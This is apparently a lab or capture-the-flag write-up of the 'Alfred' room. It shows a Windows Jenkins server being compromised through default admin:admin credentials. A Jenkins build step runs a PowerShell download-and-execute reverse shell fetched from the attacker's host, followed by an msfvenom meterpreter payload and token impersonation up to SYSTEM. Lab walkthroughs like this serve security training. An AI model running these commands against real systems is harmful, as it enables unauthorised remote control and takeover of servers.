Post

Alfred

  • Exploit common misconfigurations on Jenkins, a widely used automation server.
  • Jenkins is utilized during DevOps integration and continuous development pipelines.
  • It allows developers to automatically deploy their code after making changes.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
IP=10.10.50.153
┌──(kali㉿kali)-[~/assets]
└─$ nmap -sV -sC -T5 -vvv $IP              
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 18:50 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Initiating Ping Scan at 18:50
Scanning 10.10.50.153 [2 ports]
Completed Ping Scan at 18:50, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:50
Completed Parallel DNS resolution of 1 host. at 18:50, 0.09s elapsed
DNS resolution of 1 IPs took 0.09s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:50
Scanning 10.10.50.153 [1000 ports]
Discovered open port 3389/tcp on 10.10.50.153
Discovered open port 8080/tcp on 10.10.50.153
Discovered open port 80/tcp on 10.10.50.153

  • Number of open TCP ports: 4
  • Navigated to the site and found information.

<img width="200" height+"300" src="bruce.jpg"><br /><br />RIP Bruce Wayne<br /><br /> Donations to <strong>[email protected]</strong> are greatly appreciated.

  • Navigated to: http://10.10.50.153:8080
  • Tried username and password: admin:admin
  • Login was successful.
  • Created a Jenkins project by selecting “New Item”.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
┌──(kali㉿kali)-[~/assets]
└─$ wget https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/2c6e4a2d6fd72ba0f103cce2afa3b492e347edc2/powershell_reverse_shell.ps1


┌──(kali㉿kali)-[~/assets]
└─$ mv powershell_reverse_shell.ps1 PowerShell.ps1
  
#INCLUDE MY IP AND PORT
vim PowerShell.ps1


┌──(kali㉿kali)-[~/assets]
└─$ mv PowerShell.ps1 ../server                   
                                  
┌──(kali㉿kali)-[~/server]
└─$ python -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

┌──(kali㉿kali)-[~/assets]
└─$ netcat -nlvp 4443                                
listening on [any] 4443 ...


#ON JENKINS I ENTERED:
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.53.56/PowerShell.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.53.56 -Port 4443

#GOT ERROR

WorkflowScript: 5: unexpected token: Net @ line 5, column 28.
   powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.53.56/PowerShell.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.53.56 -Port 4443
                              ^

1 error


#HAVE TO DO IT THROUGH GROOVY SCRIPT?

~NO

#ABLE TO RUN "EXECUTE WINDOWS BATCH COMMAND"

#TRY AGAIN

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

┌──(kali㉿kali)-[~/nishang/Execution]
└─$ mv Invoke-PowerShellTcp.ps1 /home/kali/server/

┌──(kali㉿kali)-[~/server]
└─$ python -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...


#IN JENKINS 
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.53.56:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.53.56 -Port 4443 

┌──(kali㉿kali)-[~/server]
└─$ python -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.50.153 - - [08/May/2022 19:28:14] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -


┌──(kali㉿kali)-[~/assets]
└─$ netcat -nlvp 4443
listening on [any] 4443 ...
connect to [10.11.53.56] from (UNKNOWN) [10.10.50.153] 49223
Windows PowerShell running as user bruce on ALFRED
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Program Files (x86)\Jenkins\workspace\project>


PS C:\Program Files (x86)\Jenkins\workspace\project>whoami
alfred\bruce
PS C:\Program Files (x86)\Jenkins\workspace\project> 

PS C:\Users\bruce> cd Desktop
PS C:\Users\bruce\Desktop> ls


    Directory: C:\Users\bruce\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-a---        10/25/2019  11:22 PM         32 user.txt                          


PS C:\Users\bruce\Desktop> cat user.txt
79007a09481963edf2e1321abd9ae2a0
PS C:\Users\bruce\Desktop> 

Switching Shells

Switched to a meterpreter reverse shell using the following process:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
┌──(kali㉿kali)-[~/server]
└─$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.53.56 LPORT=4443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe


PS C:\Users\bruce\Desktop> powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.53.56:80/shell.exe','shell.exe')"


┌──(kali㉿kali)-[~/server]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.50.153 - - [08/May/2022 19:39:30] "GET /shell.exe HTTP/1.1" 200 -


msfconsole


msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.11.53.56
LHOST => 10.11.53.56
msf6 exploit(multi/handler) > set LPORT 4443
LPORT => 4443
msf6 exploit(multi/handler) > 



PS C:\Users\bruce\Desktop> . .\shell.exe



- [ ] 
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.11.53.56:4443 
[*] Sending stage (175174 bytes) to 10.10.50.153
[*] Meterpreter session 2 opened (10.11.53.56:4443 -> 10.10.50.153:49250 ) at 2022-05-08 19:45:25 -0400

meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2022-05-08 19:45:11 -0400  shell.exe


Privilege Escalation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37



use powershell
meterpreter > powershell_shell
PS > 

PS > whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
  • Initial access has been obtained.
  • Use token impersonation to gain system access.
  • Windows uses tokens to manage account permissions for actions.
  • Account tokens are assigned during login or authentication by LSASS.exe.
  • Access tokens include User SIDs, group SIDs, and privileges.

More information can be found here


  • Two privileges are enabled: SeDebugPrivilege and SelmpersonatePrivilege.
  • The incognito module will be used to exploit this vulnerability. ```powershell

meterpreter > load incognito Loading extension incognito…Success. meterpreter >

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
We will now check which tokens are available:
```powershell

list_tokens -g

meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WinDefend
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\CryptSvc
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\LanmanWorkstation
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\NlaSvc
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\TermService
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc


  • The BUILTIN/Administrator token is available.
  • Proceed to impersonate the Administrator token.
1
2
3
4
5
6
7
8
9
10
11
12

meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > 

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

  • Having a higher privileged token does not guarantee privileged user permissions.
  • Windows determines permissions based on the Primary Token of the process.
  • The impersonated token is not used to determine process capabilities.

  • Migrate to a process while impersonating NT AUTHORITY\SYSTEM.
  • The safest choice for migration is the services.exe process.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

 668   580   services.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe

meterpreter > migrate 668
[*] Migrating from 2664 to 668...
[*] Migration completed successfully.
meterpreter > 





100666/rw-rw-rw-  70        fil   2019-10-26 07:36:00 -0400  root.txt
040777/rwxrwxrwx  4096      dir   2010-11-20 21:41:37 -0500  systemprofile

meterpreter > cat root.txt
��dff0f748678f280250f25a45b8046b4a
meterpreter > 



This post is licensed under CC BY 4.0 by the author.